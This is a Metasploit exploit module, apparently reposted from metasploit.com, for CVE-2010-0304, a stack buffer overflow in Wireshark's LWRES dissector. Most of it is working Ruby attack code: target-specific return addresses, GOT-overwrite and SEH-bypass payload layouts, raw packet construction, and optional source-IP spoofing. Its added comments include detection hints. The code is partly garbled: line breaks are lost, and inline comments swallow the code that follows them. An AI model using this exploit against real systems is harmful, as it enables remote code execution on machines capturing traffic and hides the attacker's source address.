Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:jduck 发布时间:2010-02-08  
##
# $Id: wireshark_lwres_getaddrbyname.rb 8367 2010-02-04 04:56:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'racket'

#
# Metasploit exploit module for CVE-2010-0304: a stack-based buffer overflow in
# the Wireshark LWRES dissector (dissect_getaddrsbyname_request), reached when a
# captured datagram on the LWRES port (RPORT defaults to 921 below) is dissected.
# The affected version ranges are those stated in 'Description'; the vendor
# advisory is the wnpa-sec-2010-02 URL listed under 'References'.
#
# The `exploit` method (on the long lines below) builds a per-target overflow
# string, wraps it in an LWRES request whose name-length field is set to
# str.length, and sends it either through a plain UDP socket or, when SHOST is
# set, as a raw IPv4/UDP packet via Racket and the Capture mixin's capture_sendto.
#
# Defender notes, grounded in this module's own options and comments:
#   - The trigger is a single UDP datagram to the LWRES port whose name length
#     far exceeds any legitimate name, so a detection rule on LWRES traffic with
#     an oversized name-length field is a reasonable signature; the description
#     notes that the larger variants fragment, so IP reassembly is needed to
#     inspect them.
#   - With SHOST set the IPv4 source address is forged, so the source seen in
#     capture logs cannot be trusted for attribution.
#   - Only hosts that actively capture and dissect traffic are exposed; per the
#     inline comment on 'Privileged', the dissecting process holds at least
#     capture privilege, which a successful payload inherits. Updating
#     Wireshark/tshark beyond the affected ranges removes the bug.
#
# NOTE(review): line breaks in the three long lines below were lost in
# extraction, so the inline '#' comments there swallow the code that followed
# them on the original lines; the listing is not parseable as pasted.
#
class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh
	include Msf::Exploit::Capture

	# Declares module metadata, payload constraints (512 bytes, no NUL byte),
	# the per-target return addresses / offsets, and the options RPORT (921)
	# and the optional spoofed source address SHOST. FILTER and PCAPFILE from
	# the Capture mixin are deregistered because this module does not use them.
	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow',
			'Description' => %q{
					The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through
				1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer
				overflow. This bug found and reported by babi.

				This particular exploit targets the dissect_getaddrsbyname_request function. Several
				other functions also contain potentially exploitable stack-based buffer overflows.

				The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents
				exploitation via the return address on the stack. Sending a larger string allows
				exploitation using the SEH bypass method. However, this packet will usually get
				fragmented, which may cause additional complications.

				NOTE: The vulnerable code is reached only when the packet dissection is rendered.
				If the packet is fragmented, all fragments must be captured and reassembled to
				exploit this issue.
			},
			'Author'      =>
				[
					'babi',   # original discovery/exploit
					'jduck',  # ported from public exploit
					'redsand' # windows target/testing
				],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 8367 
, 'References' => [ [ 'CVE', '2010-0304' ], [ 'OSVDB', '61987' ], [ 'BID', '37985' ], [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2010-02.html' ], [ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, # at least capture privilege 'Payload' => { 'Space' => 512, 'BadChars' => "\x00", 'DisableNops' => true, }, 'Targets' => [ [ 'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)', # breakpoint: lwres.so + 0x2ce2 { 'Arch' => ARCH_X86, 'Platform' => 'linux', # conveniently, edx pointed at our string.. # and so, we write it to g_slist_append's GOT entry just before its called. # pwnt. # # mov [ebx+0xc],edx / jmp 0x804fc40 --> # mov [esp+4],eax / mov eax,[edi+8] / mov [esp],eax / call g_slist_append # 'Ret' => 0x804fc85, # see above.. 'RetOff' => 376, 'Readable' => 0x804fa04, # just anything 'GotAddr' => 0x080709c8 # objdump -R tshark | grep g_slist_append } ], [ 'wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'linux', # the method for tshark doesn't work, since there aren't any convenient # pointers lying around (in reg/close on stack) # # since the wireshark bin has a jmp esp, we'll just use that method.. 
'Ret' => 0x818fce8, # jmp esp in wireshark bin 'RetOff' => 376, 'Readable' => 0x8066a40, # just any old readable addr (unused) 'GotAddr' => 0x818601c # objdump -R wireshark | grep g_slist_append (unused) } ], [ 'wireshark 1.2.5 on RHEL 5.4 (x64)', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux', 'Ret' => 0xfeedfed5deadbeef, 'RetOff' => 152, } ], [ 'wireshark 1.2.5 on Mac OS X 10.5 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'osx', 'Ret' => 0xdeadbeef, 'RetOff' => 268, } ], # The following target was tested against Windows XP SP3 and Windows Vista [ 'wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win', # NOTE: due to the length of this packet, your mileage may vary. 'Ret' => 0x61B4121B, # 0x655810b6 = pop/pop/ret in libpango # 0x02A110B6 = pop/pop/ret in libgtk-w # 0x03D710CC = pop/mov/pop/ret in packet # 0x61B4121B = pop/pop/ret in pcre3 'RetOff' => 2128, } ], ], 'DisclosureDate' => 'Jan 27 2010')) register_options([ Opt::RPORT(921), OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]) ], self.class) deregister_options('FILTER','PCAPFILE') end def exploit ret_offset = target['RetOff'] # we have different techniques depending on the target if (target == targets[0]) # debian tshark str = make_nops(ret_offset - payload.encoded.length - 16) str << payload.encoded str << [target['GotAddr'] - 0xc].pack('V') str << rand_text(4) str << [target['Readable']].pack('V') str << rand_text(4) # ret is next elsif (target == targets[1]) fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string str = make_nops(ret_offset - fix_esp.length - payload.encoded.length) str << fix_esp str << payload.encoded # jmp esp... 
str << [target.ret].pack('V') # jump back distance = ret_offset + 4 str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string elsif (target == targets[4]) # ugh, /GS and UDP length issues :-/ str = make_nops(ret_offset - payload.encoded.length) str << payload.encoded str << generate_seh_record(target.ret) # jump back distance = ret_offset + 8 str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string else # this is just a simple DoS payload str = Rex::Text.pattern_create(ret_offset) #str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp ___FCKpd___06").encode_string end # add return address #XXX: this isn't working? #str << Rex::Arch.pack_addr(target.arch, target.ret) str << [target.ret].pack('V') # form the packet's payload! sploit = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01" sploit << "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x01" sploit << [str.length].pack('n') sploit << str sploit << "\x00\x00" shost = datastore['SHOST'] if (shost) print_status("Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})") open_pcap n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost) n.l3.dst_ip = rhost n.l3.protocol = 6 n.l3.id = rand(0x10000) n.l3.ttl = 64 n.l4 = Racket::L4::UDP.new n.l4.src_port = rand((2**16)-1024)+1024 n.l4.dst_port = datastore['RPORT'].to_i n.l4.payload = sploit n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) pkt = n.pack capture_sendto(pkt, rhost) close_pcap handler else print_status("Sending malformed LWRES packet to #{rhost}") connect_udp udp_sock.put(sploit) handler disconnect_udp end end end
 